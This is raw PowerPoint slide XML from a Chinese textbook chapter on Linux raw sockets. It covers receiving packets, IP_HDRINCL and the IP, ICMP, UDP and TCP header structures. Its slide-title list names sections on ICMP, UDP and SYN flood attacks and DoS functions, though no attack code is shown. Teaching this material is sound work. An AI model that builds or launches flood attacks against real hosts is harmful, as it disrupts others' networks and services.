              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>通常可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>recvfrom()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>recv()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>read()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>获得数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>当设置了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP_RINCL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>后，接收的缓冲区为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部的第一个字节。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>当没有设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP_RINCL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的时候，接收的缓冲区为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>数据区域的第一个字节。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274711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smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>13.5  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>原始套接字报文处理时的结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.5.1  IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.5.2  ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.5.3  UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.5.4  TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头部结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3592182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第1章  Linux操作系统概述</Template>
  <TotalTime>19</TotalTime>
  <Words>2915</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>269</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聚合</vt:lpstr>
      <vt:lpstr>第13章  原始套接字</vt:lpstr>
      <vt:lpstr>13.1  概    述</vt:lpstr>
      <vt:lpstr>13.2  原始套接字的创建</vt:lpstr>
      <vt:lpstr>13.2.1  SOCK_RAW选项</vt:lpstr>
      <vt:lpstr>13.2.2  IP_HDRINCL套接字选项</vt:lpstr>
      <vt:lpstr>13.2.3  不需要bind()函数</vt:lpstr>
      <vt:lpstr>13.3  原始套接字发送报文</vt:lpstr>
      <vt:lpstr>13.4  原始套接字接收报文</vt:lpstr>
      <vt:lpstr>13.5  原始套接字报文处理时的结构</vt:lpstr>
      <vt:lpstr>13.5.1  IP头部的结构</vt:lpstr>
      <vt:lpstr>13.5.2  ICMP头部结构</vt:lpstr>
      <vt:lpstr>1．ICMP的头部结构</vt:lpstr>
      <vt:lpstr>2．不同类型的ICMP请求</vt:lpstr>
      <vt:lpstr>13.5.3  UDP头部结构</vt:lpstr>
      <vt:lpstr>13.5.4  TCP头部结构</vt:lpstr>
      <vt:lpstr>13.6  ping的例子</vt:lpstr>
      <vt:lpstr>13.6.1  协议格式</vt:lpstr>
      <vt:lpstr>13.6.2  校验和函数</vt:lpstr>
      <vt:lpstr>13.6.3  设置ICMP发送报文的头部</vt:lpstr>
      <vt:lpstr>13.6.4  剥离ICMP接受报文的头部</vt:lpstr>
      <vt:lpstr>13.6.5  计算时间差</vt:lpstr>
      <vt:lpstr>13.6.6  发送报文</vt:lpstr>
      <vt:lpstr>13.6.7  接收报文</vt:lpstr>
      <vt:lpstr>13.6.8  主函数过程</vt:lpstr>
      <vt:lpstr>1．ping数据的数据结构</vt:lpstr>
      <vt:lpstr>2．信号SIGINT处理函数</vt:lpstr>
      <vt:lpstr>3．查找数组中的标识函数icmp_findpacket()</vt:lpstr>
      <vt:lpstr>4．统计数据结果函数icmp_statistics()</vt:lpstr>
      <vt:lpstr>13.6.9  主函数main()</vt:lpstr>
      <vt:lpstr>13.6.10  编译测试</vt:lpstr>
      <vt:lpstr>13.7  洪 水 攻 击</vt:lpstr>
      <vt:lpstr>13.8  ICMP洪水攻击</vt:lpstr>
      <vt:lpstr>13.8.1  ICMP洪水攻击的原理</vt:lpstr>
      <vt:lpstr>13.8.2  ICMP洪水攻击的例子</vt:lpstr>
      <vt:lpstr>1．随机函数myrandom</vt:lpstr>
      <vt:lpstr>2．多线程函数DoS_fun()</vt:lpstr>
      <vt:lpstr>3．ICMP头部打包函数DoS_icmp()</vt:lpstr>
      <vt:lpstr>4．线程函数DoS_fun()</vt:lpstr>
      <vt:lpstr>5．主函数</vt:lpstr>
      <vt:lpstr>13.9  UDP洪水攻击</vt:lpstr>
      <vt:lpstr>13.10  SYN洪水攻击</vt:lpstr>
      <vt:lpstr>13.10.1  SYN洪水攻击的原理</vt:lpstr>
      <vt:lpstr>13.10.2  SYN洪水攻击的例子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原始套接字</dc:title>
  <dc:creator>xu</dc:creator>
  <cp:lastModifiedBy>xu</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-08-13T07:17:08Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-08-13T07:36:54Z</dcterms:modified>
</cp:coreProperties>
</file>